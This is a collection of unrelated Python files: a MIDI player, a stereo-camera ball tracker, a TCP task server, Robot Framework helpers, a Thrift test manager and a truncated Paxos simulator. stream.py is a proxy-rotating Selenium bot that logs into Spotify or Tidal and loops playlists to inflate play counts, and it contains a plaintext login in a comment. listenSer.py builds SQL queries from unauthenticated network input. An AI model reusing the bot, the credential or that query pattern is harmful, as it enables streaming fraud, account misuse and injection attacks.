self.data_manager.parse_music(self.parse_section(line), self.pt, self.base_freq)
self.data_manager.output_current()
def play_file(self, filename):
auto_format_for_file(filename)
data = read_io_file(filename)
self.compile_music(data.split("\n"))
self.stream_music(data.split("\n"))
def close(self):
self.output.close()
from common.io.file import project_root
if __name__ == '__main__':
player = MidiPlayer()
player.force_instrument = True
player.play_file("yuxitan.ply")
player.play_file("klodia.ply")
player.play_file("lightofhumanity.ply")
player.play_file("ningchi.ply")
player.play_file("astronomia.ply")
player.play_file("railgun_piano.ply")
player.play_file("level5.ply")
player.play_file("faded.ply")
player.play_file("myHeartWillGoOn.ply")
player.play_file("qianbenying.ply")
player.play_file("one_punch.ply")
player.play_file("nextToYou.ply")
player.play_file("tail.ply")
player.play_file("bird.ply")
player.play_file("sisterNoise.ply")
player.play_file("tanzilang.ply")
player.play_file("railgun.ply")
player.play_file("canon_1.ply")
player.play_file("west.ply")
player.play_file("xiaozhiqu.ply")
# player.play_section(player.parse_section(
# "0 0 ..2 0 | 0_.6 ..1_..3 .5 0_-_..1_.7|..1_6 .1_.3 .2 0_-_.1_.7|0_-_6.._3. 1_3._1._6.. 0_-_4.._1. 6._1._6.._4..[ins=99]"))
player.close()
|
ThreadImage.py
|
from threading import Lock, Thread
from time import sleep
import threading
import pyzed.sl as sl
import time
import cv2
import numpy as np
import imutils
def load_image_into_numpy_array(image):
ar = image.get_data()
ar = ar[:, :, 0:3]
(im_height, im_width, channels) = image.get_data().shape
return np.array(ar).reshape((im_height, im_width, 3)).astype(np.uint8)
width = 2560
height = 720
image_np_global = np.zeros([height, width, 3], dtype=np.uint8)  # (rows, cols, channels)
new_data = False
exit_signal = False
def FetchDataFunc():
global image_np_global, exit_signal, new_data
    image_np_global = np.zeros([height, width, 3], dtype=np.uint8)  # (rows, cols, channels)
zed = sl.Camera()
input_type = sl.InputType()
init_params = sl.InitParameters(input_t=input_type)
init_params.camera_resolution = sl.RESOLUTION.HD720
init_params.camera_fps = 60
init_params.svo_real_time_mode = True
err = zed.open(init_params)
print(err)
while err != sl.ERROR_CODE.SUCCESS:
err = zed.open(init_params)
print(err)
time.sleep(1)
image_mat = sl.Mat()
runtime_parameters = sl.RuntimeParameters()
image_size = sl.Resolution(width, height)
while not exit_signal:
if zed.grab(runtime_parameters) == sl.ERROR_CODE.SUCCESS:
zed.retrieve_image(image_mat, sl.VIEW.SIDE_BY_SIDE, resolution=image_size)
threadLock.acquire()
image_np_global = load_image_into_numpy_array(image_mat)
new_data = True
threadLock.release()
time.sleep(0.01)
print('I have get the data.')
zed.close()
threadLock = threading.Lock()
def main():
global image_np_global, exit_signal, new_data
capture_thread = Thread(target=FetchDataFunc)
capture_thread.start()
    print('This is the main process.')
while not exit_signal:
if new_data == True:
threadLock.acquire()
gray = cv2.cvtColor(image_np_global, cv2.COLOR_BGR2GRAY)
new_data = False
threadLock.release()
# Add the image process.
LeftImage = image_np_global[0:720, 0:1280]
RightImage = image_np_global[0:720, 1280:2560]
Leftblurred = cv2.GaussianBlur(LeftImage, (11, 11), 0)
Rightblurred = cv2.GaussianBlur(RightImage, (11, 11), 0)
Lefthsv = cv2.cvtColor(Leftblurred, cv2.COLOR_BGR2HSV)
Righthsv = cv2.cvtColor(Rightblurred, cv2.COLOR_BGR2HSV)
greenLower = (29, 86, 6)
greenUpper = (64, 255, 255)
Leftmask = cv2.inRange(Lefthsv, greenLower, greenUpper)
Rightmask = cv2.inRange(Righthsv, greenLower, greenUpper)
Leftmask = cv2.erode(Leftmask, None, iterations=2)
Rightmask = cv2.erode(Rightmask, None, iterations=2)
Leftmask = cv2.dilate(Leftmask, None, iterations=2)
Rightmask = cv2.dilate(Rightmask, None, iterations=2)
Lcnts = cv2.findContours(Leftmask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
Lcnts = imutils.grab_contours(Lcnts)
Rcnts = cv2.findContours(Rightmask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
Rcnts = imutils.grab_contours(Rcnts)
Lcenter = None
Rcenter = None
# only proceed if at least one contour was found
if len(Lcnts) > 0 and len(Rcnts) > 0:
# find the largest contour in the mask, then use
# it to compute the minimum enclosing circle and
# centroid
Lc = max(Lcnts, key=cv2.contourArea)
Rc = max(Rcnts, key=cv2.contourArea)
((Lx, Ly), Lradius) = cv2.minEnclosingCircle(Lc)
((Rx, Ry), Rradius) = cv2.minEnclosingCircle(Rc)
LM = cv2.moments(Lc)
RM = cv2.moments(Rc)
Lcenter = (int(LM["m10"] / LM["m00"]), int(LM["m01"] / LM["m00"]))
Rcenter = (int(RM["m10"] / RM["m00"]), int(RM["m01"] / RM["m00"]))
# only proceed if the radius meets a minimum size
if Lradius > 10 and Rradius > 10:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(LeftImage, (int(Lx), int(Ly)), int(Lradius),
(0, 255, 255), 2)
cv2.circle(LeftImage, Lcenter, 5, (0, 0, 255), -1)
cv2.circle(RightImage, (int(Rx), int(Ry)), int(Rradius),
(0, 255, 255), 2)
cv2.circle(RightImage, Rcenter, 5, (0, 0, 255), -1)
cv2.imshow('LeftImage', LeftImage)
cv2.imshow('RightImage', RightImage)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
exit_signal = True
break
else:
sleep(0.01)
exit_signal = True
capture_thread.join()
if __name__ == '__main__':
main()
|
listenSer.py
|
'''
**************************************************
*            Agent listening module              *
*                                                *
*  1. Listen for agent controller setup requests *
*  2. Loop over and process tasks in the queue   *
*  3. Receive requests and execute them          *
*                                                *
*  author: joliu<joliu@s-an.org>                 *
*  date: 2018-3-21                               *
**************************************************
'''
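# A minimal sketch of the '&'-separated wire protocol handled below (the field values are
# hypothetical placeholders): a controller sends e.g. "controller&add&<task>&<ctime>", a
# device request looks like "device&<command>", and the reply is a JSON-encoded
# (status, output) pair.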
import socket
import threading
import socketserver
import json
import os
import time
import subprocess
import logging
import sqlite3
# Two control modes: 'controller' lets the controller write control commands; 'device' receives control commands from other sensors
controlModeList = ['controller', 'device']
controlMethodList = ['add', 'rm', 'clear', 'period', 'show']
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
'''
    Message listening handler
'''
def handle(self):
        # Device busy flag
busyFlag = False
        # Error flag
errorFlag = False
try:
            # Receive the socket message
data = self.request.recv(1024).decode()
except socket.error as err_msg:
            # Return the exception information
(status, output) = (-1, err_msg)
            # Exception handling
print("recv error!")
exit(1)
message = data.split('&')
        # Check the control mode
controlMode = message[0]
print(message)
if controlMode in controlModeList:
if controlMode == "controller":
                # Write the control command into the task queue
print(message[1])
command = message[1]
                # Check whether the command is legal
if not command in controlMethodList:
print("error: illegal command")
errorFlag = True
(status, output) = (-1, "illegal controller command: %s" % command)
else:
                    # Match the control command and perform the corresponding action
(status, output) = executeCommand(command, message[2:])
            # Listen for control requests from the device hfv module
elif controlMode == "device":
command = message[1]
                # Send the control request
(status, output) = sendCommandToDevice(command)
# (status, output) = (1, "test")
else:
pass
else:
print("illegal controlMode")
(status, output) = (-1, 'illegal controlMode')
errorFlag = True
        # Return the result of executing the control command
jresp = json.dumps((status, str(output)))
try:
self.request.sendall(jresp.encode())
except socket.error as err_msg:
print("socket failed %s" % err_msg)
exit(1)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
# Send a control command to the device
def sendCommandToDevice(cmd):
    # Get the bound sensor's IP address from the container's HOST environment variable
ip, port = os.getenv('HOST'), 8085
return sendBySocket(ip, port, cmd)
# Send a message over a socket
def sendBySocket(ip, port, cmd):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err_msg:
print("Error creating socket:%s" % err_msg)
s.close()
return (-1, err_msg)
try:
s.connect((ip, port))
except socket.error as err_msg:
print("Address-related error connecting to server: %s" % err_msg)
s.close()
return (-1, err_msg)
print("****************send:" + cmd)
try:
s.sendall(cmd.encode())
except socket.error as err_msg:
print("Error sending data: %s" % err_msg)
s.close()
return (-1, err_msg)
try:
response = s.recv(1024).decode()
print(response)
except socket.error as err_msg:
print("Error receiving data: %s" % err_msg)
s.close()
return (-1, err_msg)
print(str(response))
s.close()
    # On success, return the data returned by the target sensor
return (1, str(response))
# Execute a control command
def executeCommand(command, information):
if command == "add":
        # For now assume 'information' holds the entire control command
task = information[0]
ctime = information[1]
print("****************")
print(task)
print(ctime)
(status, output) = insertDB(task, ctime)
print(output)
elif command == "clear":
        # Clear the task queue
(status, output) = clearDB()
elif command == "period":
ctime = information[0]
        # Set the polling period
(status, output) = updatePeriod(ctime)
elif command == "show":
(status, output) = showDB()
print(output)
else:
        # Possibly caused by the command list being updated without the corresponding feature being implemented yet
(status, output) = (-1, "method isn't ready")
return (status, output)
# Create the database
def createDB():
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute("""CREATE TABLE if not exists task
(cmd text, hashtext text, ctime int(5))
""")
conn.commit()
cursor.close()
conn.close()
# Set the time period
def updatePeriod(cTime):
try:
sql = 'update task set ctime=' + str(cTime)
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute(sql)
conn.commit()
(status, output) = (1, cTime)
except sqlite3.Error as err_msg:
print("Database error: %s", err_msg)
(status, output) = (-1, err_msg)
except Exception as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
# Insert a task into the database
def insertDB(task, ctime):
try:
hashtext = str(time.time()).split(".")[1]
sql = "insert into task values ('" + task + "', '" + hashtext + "', " + ctime + ")"
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute(sql)
conn.commit()
(status, output) = (1, hashtext)
except sqlite3.Error as err_msg:
print("Database error: %s", err_msg)
(status, output) = (-1, err_msg)
except Exception as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
# Clear the database
def clearDB():
try:
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute("delete from task")
conn.commit()
(status, output) = (-1, "delete success")
except sqlite3.Error as err_msg:
print("Database error: %s", err_msg)
(status, output) = (-1, err_msg)
    except Exception as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
# Show the database contents
def showDB():
try:
conn = sqlite3.connect("task.db")
cursor = conn.cursor()
cursor.execute("select * from task")
data = cursor.fetchall()
if data is None:
(status, output) = (1, 0)
else:
(status, output) = (1, data)
except sqlite3.Error as err_msg:
(status, output) = (-1, err_msg)
    except Exception as err_msg:
(status, output) = (-1, err_msg)
finally:
cursor.close()
conn.close()
return (status, output)
if __name__ == "__main__":
createDB()
    # Set host and port
HOST, PORT = "0.0.0.0", 3000
logger = logging.getLogger("TCPServer")
logger.setLevel(logging.INFO)
    # Create a log file handler
fh = logging.FileHandler("1.log")
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s -\
%(message)s')
    # Add the handler to the logger
logger.addHandler(fh)
logger.info("Program started")
socketserver.TCPServer.allow_reuse_address = True
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
    # Start the listening service in a separate thread
server_thread = threading.Thread(target=server.serve_forever)
    # Exit the program when the main process is interrupted
server_thread.daemon = True
server_thread.start()
logger.info("Server loop running in thread:" + server_thread.name)
logger.info("....waiting for connection")
    # Use Ctrl+C to exit the program
server.serve_forever()
|
runKeywordAsync.py
|
import sys
import os
import time
from robot.libraries.BuiltIn import BuiltIn
from robot.output.logger import LOGGER
class runKeywordAsync:
def __init__(self):
self._thread_pool = {}
self._last_thread_handle = 1
#self._robot_log_level = BuiltIn().get_variable_value("${LOG_LEVEL}")
def run_method_async(self, keyword, *args, **kwargs):
#BuiltIn().set_log_level("NONE")
handle = self._last_thread_handle
thread = self._threaded_method(keyword, *args, **kwargs)
thread.start()
self._thread_pool[handle] = thread
self._last_thread_handle += 1
return handle
def run_keyword_async(self, keyword, *args):
#BuiltIn().set_log_level("NONE")
handle = self._last_thread_handle
thread = self._threaded(keyword, *args)
thread.start()
self._thread_pool[handle] = thread
self._last_thread_handle += 1
return handle
def wait_async_all(self, timeout=60):
timeout = int(timeout)
results = []
for thread in self._thread_pool:
try:
result = self._thread_pool[thread].result_queue.get(True, timeout)
results.append(result)
except:
#BuiltIn().set_log_level(self._robot_log_level)
for thread in self._thread_pool:
self._thread_pool[thread].terminate()
raise Exception("Process " + str(thread) + " Failed")
#BuiltIn().set_log_level(self._robot_log_level)
self._thread_pool = {}
self._last_thread_handle = 1
return results
def get_async_return(self, handle, timeout=60):
timeout = int(timeout)
if handle in self._thread_pool:
try:
result = self._thread_pool[handle].result_queue.get(True, timeout)
del self._thread_pool[handle]
                #BuiltIn().set_log_level(self._robot_log_level)
return result
except:
raise Exception("Process " + str(handle) + " Failed")
else:
raise Exception("Passed Process id " + str(handle) + " is not a valid id")
def _threaded_method(self, keyword, *args, **kwargs):
from multiprocessing import Queue
from multiprocessing import Process
def wrapped_f(q, *args, **kwargs):
''' Calls the decorated function and puts the result in a queue '''
ret = BuiltIn().call_method(keyword, *args, **kwargs)
q.put(ret)
q = Queue()
th = Process(target=wrapped_f, args=(q,)+args, kwargs=kwargs)
th.result_queue = q
return th
def _threaded(self, keyword, *args):
from multiprocessing import Queue
from multiprocessing import Process
def wrapped_f(q, *args):
''' Calls the decorated function and puts the result in a queue '''
LOGGER.unregister_xml_logger()
ret = BuiltIn().run_keyword(keyword, *args)
q.put(ret)
globals()['wrapped_f']=wrapped_f
q = Queue()
th = Process(target=wrapped_f, args=(q,)+args)
th.result_queue = q
return th
|
stream.py
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from threading import Thread
import time
import string, random, zipfile
import var
import db
class bot():
def __init__(self, ip, id):
self.id = id
PROXY_HOST = ip
PROXY_PORT = var.proxy_port
PROXY_USER = var.proxy_user
PROXY_PASS = var.proxy_pass
print(PROXY_HOST, PROXY_PORT, PROXY_USER, PROXY_PASS)
manifest_json = """
{
"version": "1.0.0",
"manifest_version": 2,
"name": "Chrome Proxy",
"permissions": [
"proxy",
"tabs",
"unlimitedStorage",
"storage",
"<all_urls>",
"webRequest",
"webRequestBlocking"
],
"background": {
"scripts": ["background.js"]
},
"minimum_chrome_version":"22.0.0"
}
"""
background_js = """
var config = {
mode: "fixed_servers",
rules: {
singleProxy: {
scheme: "http",
host: "%(host)s",
port: parseInt(%(port)d)
},
bypassList: ["foobar.com"]
}
};
chrome.proxy.settings.set({value: config, scope: "regular"}, function() {});
function callbackFn(details) {
return {
authCredentials: {
username: "%(user)s",
password: "%(pass)s"
}
};
}
chrome.webRequest.onAuthRequired.addListener(
callbackFn,
{urls: ["<all_urls>"]},
['blocking']
);
""" % {
"host": PROXY_HOST,
"port": PROXY_PORT,
"user": PROXY_USER,
"pass": PROXY_PASS,
}
pluginfile = 'proxy_auth_plugin.zip'
with zipfile.ZipFile(pluginfile, 'w') as zp:
zp.writestr("manifest.json", manifest_json)
zp.writestr("background.js", background_js)
co = Options()
co.add_argument("--start-maximized")
co.add_extension(pluginfile)
self.timeOut = 30
self.spotify_link = "https://accounts.spotify.com/en/login/"
self.tidal_link = "https://listen.tidal.com/login"
self.test_link = "http://lumtest.com/myip.json"
# ----- without image ----- (uncomment this)
prefs = {"profile.managed_default_content_settings.images": 2}
co.add_experimental_option("prefs", prefs)
self.driver = webdriver.Chrome(executable_path='chromedriver', chrome_options=co)
self.driver.get(self.test_link)
Thread(target=self.stop,daemon=True).start()
Thread(target=self.stop_all,daemon=True).start()
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.TAG_NAME, "body")))
self.driver.maximize_window()
def login_spotify(self, email, password):
count = 0
while count<10:
try:
count+=1
self.driver.get(self.spotify_link)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.ID, "login-username")))
self.driver.find_element_by_id("login-username").send_keys(email + Keys.TAB + password + Keys.ENTER)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.TAG_NAME, "body")))
time.sleep(10)
break
except:
continue
def stream_spotify(self, link, id):
try:
self.driver.get(link)
time.sleep(var.time_duration+5)
conn = db.db_ceate()
conn.update_count(id)
conn.close()
except Exception as e:
print("Exeception occured at stream {} :{} ".format(self.id, e))
def login_tidal(self, email, password):
count = 0
while count<10:
try:
count+=1
self.driver.get(self.tidal_link)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.CLASS_NAME, "login-facebook")))
self.driver.find_element_by_class_name("login-facebook").click()
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.ID, "email")))
self.driver.find_element_by_id("email").send_keys(email + Keys.TAB + password + Keys.ENTER)
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.TAG_NAME, "body")))
time.sleep(10)
break
except:
continue
def stream_tidal(self, link, id):
try:
self.driver.get(link)
xpath = "/html/body/div[2]/div/div/div/div[1]/div[2]/main/div[1]/div[2]/div/div[1]/span/div/header/div[2]/div[2]/button[1]"
WebDriverWait(self.driver, self.timeOut).until(EC.visibility_of_element_located((By.XPATH, xpath)))
self.driver.find_element_by_xpath(xpath).click()
time.sleep(2)
time.sleep(var.time_duration+5)
conn = db.db_ceate()
conn.update_count(id)
conn.close()
except Exception as e:
print("Exeception occured at stream {} :{} ".format(self.id, e))
def stop(self):
while True:
time.sleep(1)
if var.stop == True and self.id in var.stop_list:
try:
print("Stop - {}".format(self.id))
self.driver.quit()
except Exception as e:
print("Exeception occured at stop :{}".format(e))
finally:
break
def stop_all(self):
while True:
time.sleep(1)
if var.stop_all == True:
try:
print("Stop All - {}".format(self.id))
self.driver.quit()
except Exception as e:
print("Exeception occured at stop all :{}".format(e))
finally:
break
def main(id, username, password, playlist, proxy_ip, site):
stream = bot(proxy_ip, id)
conn = db.db_ceate()
songs = conn.get_playlist(playlist)
conn.close()
if site == "spotify":
stream.login_spotify(username, password)
while True:
try:
print("big loop {}".format(id))
for item in songs:
print("lil loop {}".format(id))
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
else:
print(id, username, proxy_ip, item[2])
stream.stream_spotify(item[2], item[0])
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
time.sleep(1)
except Exception as e:
print("Exeception occured at stream loop :{}".format(e))
break
else:
stream.login_tidal(username, password)
while True:
try:
print("big loop {}".format(id))
for item in songs:
print("lil loop {}".format(id))
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
else:
print(id, username, proxy_ip, item[2])
stream.stream_tidal(item[2], item[0])
if (var.stop_all == True) or (var.stop == True and id in var.stop_list):
break
time.sleep(1)
except Exception as e:
print("Exeception occured at stream loop :{}".format(e))
break
print("Exiting {}".format(id))
if __name__ == "__main__":
# temp = bot()
# temp.login_spotify("nathan.johnson@billionaireminded.com", "WillieB1@1")
pass
|
threading.py
|
#!/usr/bin/env python3
from threading import *
from mylib.easy.common import T
def ez_thread_factory(group=None, name=None, daemon=None):
def new_thread(target: T.Callable, *args, **kwargs):
return Thread(group=group, target=target, name=name, args=args, kwargs=kwargs, daemon=daemon)
return new_thread
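# A minimal usage sketch (hypothetical names): build a factory for daemon threads, then
# spawn one with positional and keyword arguments.
#   spawn = ez_thread_factory(daemon=True)
#   t = spawn(print, 'hello', 'world', sep=', ')
#   t.start()
#   t.join()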
|
TCppServerTestManager.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import threading
from thrift.Thrift import TProcessor
from thrift.server.TCppServer import TCppServer
class TCppServerTestManager(object):
"""
A context manager for running a TCppServer in unit tests.
Caller may pass either an Iface, a Processor, or a not-running TCppServer.
Basic example:
from mylib import MyServiceHandler
from thrift.util.TCppServerTestManager import TCppServerTestManager
        class MyServiceTest(unittest.TestCase):
def test_traffic(self):
handler = MyServiceHandler() # derived from MyService.Iface
with TCppServerTestManager(handler) as server:
host, port = server.addr()
# Talk to the server using thrift in here....
See the unit-tests for this class for better-worked-out examples.
"""
@staticmethod
def make_server(processor):
"""
Creates a TCppServer given a processor. This is the function used
internally, but it may be of interest separately as well.
"""
server = TCppServer(processor)
server.setPort(0)
server.setNumCPUWorkerThreads(1)
server.setNumIOWorkerThreads(1)
server.setNewSimpleThreadManager(
count=1,
pendingTaskCountMax=5,
enableTaskStats=False
)
return server
def __init__(self, obj, cleanUp=True):
self.__obj = obj
self.__handler = None
self.__processor = None
self.__server = None
self.__thread = None
        self.__server_started_ev = None
self.__do_cleanup = cleanUp
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Starts the server in another thread.
Returns after the server has bound to and listened on its port. Callers
may immediately open connections without needing to wait or poll.
"""
if self.__is_handler(self.__obj):
self.__handler = self.__obj
self.__processor = self.__make_processor(self.__handler)
self.__server = self.__make_server(self.__processor)
elif self.__is_processor(self.__obj):
self.__processor = self.__obj
self.__server = self.__make_server(self.__processor)
elif self.__is_server(self.__obj):
self.__server = self.__obj
else:
raise Exception("Not a handler, a processor, or a server.")
self.__server_started_ev = threading.Event()
self.__thread = threading.Thread(target=self.__serve)
self.__thread.start()
self.__server_started_ev.wait()
self.__server_started_ev = None
def stop(self):
"""
Stops the server.
Returns after the server has been stopped and all resources have been
cleaned up.
"""
self.__server.stop()
self.__thread.join()
self.__thread = None
self.__server = None
self.__processor = None
self.__handler = None
def addr(self):
"""
Returns a pair of host-addr and port on which the running server is
listening.
If constructed with a handler or a processor, addr is * or :: and port
is ephemeral.
"""
addr = self.__server.getAddress()
return addr[0], addr[1]
def __serve(self):
self.__server.setup()
self.__server_started_ev.set()
try:
self.__server.loop()
finally:
if self.__do_cleanup:
self.__server.cleanUp()
def __is_handler(self, obj):
return hasattr(obj, '_processor_type') \
and not self.__is_processor(obj)
def __is_processor(self, obj):
return isinstance(obj, TProcessor)
def __is_server(self, obj):
return isinstance(obj, TCppServer)
def __make_processor(self, handler):
return handler._processor_type(handler)
def __make_server(self, processor):
        return self.__class__.make_server(processor)
|
sim.py
|
from collections import defaultdict
from multiprocessing import Process, Queue, JoinableQueue
import queue
from threading import Thread
import time
from paxos import Proposer, Acceptor, Learner, BaseSystem
class Mailbox:
"""
Provides messaging functionality for a paxos system instance.
"""
def __init__(self, config):
self.config = config
        self.funnel = JoinableQueue()
self.inbox = [Queue() for i in range(config.num_processes)]
self.message_count = 0
# Two flags, active to signal when we haven't received any messages
# for timeout_interval seconds, and terminate to signal when we have
# been asked to shutdown by the System.
self.active = True
self.terminate = False
# If don't receive any messages in this amount of time, then shutdown.
self.timeout_interval = 3 * self.config.message_timeout
# Time stamp of the last seen message, used together with
# timeout_interval to determine when the mailbox should shutdown.
self.last_seen = None
def run(self):
print("Mailbox started")
while True:
if not self.active and self.terminate:
break
if self.active and self.last_seen and (time.time() - self.last_seen) > self.timeout_interval:
self.active = False
# Take messages off the funnel and deliver them to the appropriate
# process.
try:
dest, msg = self.funnel.get(timeout=0.5)
self.last_seen = time.time()
except queue.Empty:
pass
else:
self.inbox[dest].put(msg)
print("Mailbox shutting down")
def send(self, to, msg):
"""
Send msg to process id ``to``.
"""
# Funnel all messages through a primary queue so that we can keep track
# of when we are done (i.e. all messages are processed).
self.message_count += 1
self.funnel.put((to, msg))
def recv(self, from_):
"""
Receive (blocking) msg destined for process id ``from_``.
"""
return self.inbox[from_].get()
    def task_done(self, pid):
        """
        Mark one message as processed on the funnel queue.
        Called by agents when they are done processing a message; ``pid`` is
        accepted for interface compatibility but is not used here.
        """
        self.funnel.task_done()
def join(self):
"""
Block until all messages have finished processing and we haven't had
any messages for a while (i.e. active set to False).
"""
while self.active:
time.sleep(0.5)
# Don't join funnel queue because there's a good chance that it will
# never be fully exhausted due to heart beat messages.
#self.funnel.join()
def shutdown(self):
"""
Perform any shutdown actions prior to quitting. In this base Mailbox
class this is just a hook that isn't used.
"""
pass
def quit(self):
self.terminate = True
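# Illustrative sketch (not part of the original module): how an agent is expected
# to interact with a Mailbox instance. The real agents live in the paxos module;
# the message handling here is a placeholder.
def _example_agent_loop(pid, mailbox):
    while True:
        msg = mailbox.recv(pid)       # blocks until a message for ``pid`` arrives
        if msg == "quit":
            break
        # ... handle msg, possibly mailbox.send(other_pid, reply) ...
        mailbox.task_done(pid)        # acknowledge the message on the funnel queue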
class ResultLogger:
"""
Class to hold log of results from each learner process.
"""
def __init__(self, config):
self.config = config
self.queue = Queue()
self.active = True
        # Results: PID mapped to a dict of instance -> decided value.
self.results = defaultdict(dict)
def run(self):
print("Logger started")
while True:
if not self.active and self.queue.empty():
break
try:
source, instance, value = self.queue.get(timeout=0.5)
except queue.Empty:
pass
else:
if source == "quit":
self.active = False
else:
self.results[source][instance] = value
print("Logger shutting down")
def log_result(self, source, instance, value):
self.queue.put((source, instance, value))
def print_results(self):
print("Process Result Log:")
processes = sorted(self.results.keys())
for pid in processes:
instances = range(1, self.config.num_test_requests + 1)
results = [(instance, self.results[pid].get(instance))
for instance in instances]
print(" {}: {}".format(pid, results))
def check_results(self):
"""
        Check that each learner process got the same results in the same order.
        Return False if any learner's result list differs from the first one,
        True if all result lists are identical.
"""
results = list(self.results.values())
compare_list = results[0]
result = True
for result_list in results[1:]:
if result_list != compare_list:
result = False
print("Logger results consistent:", result)
return result
def get_summary_data(self):
return ResultSummary(self)
def print_summary(self):
summary = self.get_summary_data()
summary.print_summary()
class ResultSummary:
"""
Given a logger object, summarize its results.
"""
def __init__(self, logger):
self.logger = logger
self.instances = range(1, self.logger.config.num_test_requests + 1)
self.pids = self.logger.config.learner_ids
self.calculate()
def calculate(self):
self.calculate_missing()
self.calculate_consistency()
def calculate_missing(self):
self.learned_values = 0
self.missing_values = 0
self.total_values = 0
for i in self.instances:
for pid in self.pids:
value = self.logger.results[pid].get(i)
self.total_values += 1
if value is None:
self.missing_values += 1
else:
self.learned_values += 1
self.learned_values_percent = float(100) * self.learned_values / self.total_values
self.missing_values_percent = float(100) * self.missing_values / self.total_values
def calculate_consistency(self):
"""
Count the number of consistent and inconsistent instance results,
excluding unlearned or missing values.
"""
# Disjoint set: good and bad (consistent and inconsistent) instances.
self.good_instances = 0
self.bad_instances = 0
# Disjoint set: empty, incomplete, and complete instances representing
# no, some, or all learners learned the value.
self.empty_instances = 0
self.incomplete_instances = 0
self.complete_instances = 0
for i in self.instances:
values = set()
num_none = 0
for pid in self.pids:
value = self.logger.results[pid].get(i)
if value is None:
num_none += 1
else:
values.add(value)
length = len(values)
if length == 0:
self.good_instances += 1
self.empty_instances += 1
elif length == 1:
if num_none == 0:
self.complete_instances += 1
else:
self.incomplete_instances += 1
self.good_instances += 1
else:
self.bad_instances += 1
self.good_instances_percent = float(100) * self.good_instances / len(self.instances)
self.bad_instances_percent = float(100) * self.bad_instances / len(self.instances)
self.empty_instances_percent = float(100) * self.empty_instances / len(self.instances)
self.incomplete_instances_percent = float(100) * self.incomplete_instances / len(self.instances)
self.complete_instances_percent = float(100) * self.complete_instances / len(self.instances)
def get_summary_headings(self):
return [
"learned values", "learned values percent",
"missing values", "missing_values_percent",
"total_values",
"good_instances", "good_instances_percent",
"bad_instances", "bad_instances_percent",
"empty_instances", "empty_instances_percent",
"incomplete_instances", "incomplete_instances_percent",
"complete_instances", "complete_instances_percent",
"total instances",
]
def get_summary_data(self):
return [
self.learned_values, self.learned_values_percent,
self.missing_values, self.missing_values_percent,
self.total_values,
self.good_instances, self.good_instances_percent,
self.bad_instances, self.bad_instances_percent,
self.empty_instances, self.empty_instances_percent,
self.incomplete_instances, self.incomplete_instances_percent,
self.complete_instances, self.complete_instances_percent,
len(self.instances),
]
def print_summary(self):
print(self.get_summary_data())
print("""\
Values:
Learned: {:>6} {:>6.1f}%
Missing: {:>6} {:>6.1f}%
=======================
Total: {:>6}
Instances:
Consistent: {:>6} {:>6.1f}%
Inconsistent: {:>6} {:>6.1f}%
--------------------------
Empty: {:>6} {:>6.1f}%
Incomplete: {:>6} {:>6.1f}%
Complete: {:>6} {:>6.1f}%
==========================
Total: {:>6}
""".format(*self.get_summary_data()))
def log_summary(self):
import os
filename = 'log.txt'
print_headings = not os.path.exists(filename)
        with open(filename, 'a') as f:
            if print_headings:
                f.write('\t'.join(self.get_summary_headings()) + '\n')
            f.write('\t'.join(str(value) for value in self.get_summary_data()) + '\n')
class System(BaseSystem):
"""
Class for simulating a network of paxos agents.
"""
def __init__(self, config, mailbox=None):
"""
``mailbox`` should be a mailbox class; if None, then use default
Mailbox class.
"""
print("System starting...")
self.config = config
# Set up mailbox and logger before launching agent processes so that
# the agent processes will have access to them.
if mailbox:
mailbox_class = mailbox
else:
mailbox_class = Mailbox
self.mailbox = mailbox_class(config)
self.mailbox_process = Thread(target=self.mailbox.run, name="System Mailbox")
self.mailbox_process.start()
# Start the logger thread.
self.logger = ResultLogger(config)
self.logger_process = Thread(target=self.logger.run, name="System Logger")
self.logger_process.start()
self.processes = self.launch_processes()
def launch_processes(self):
"""
        Launch one agent process per (pid, agent_class) pair returned by the
        config's process_list(), wiring each agent to the shared mailbox and
        logger.
        Return the list of started Process objects.
"""
processes = []
for pid, agent_class in self.config.process_list():
agent = agent_class(pid, self.mailbox, self.logger)
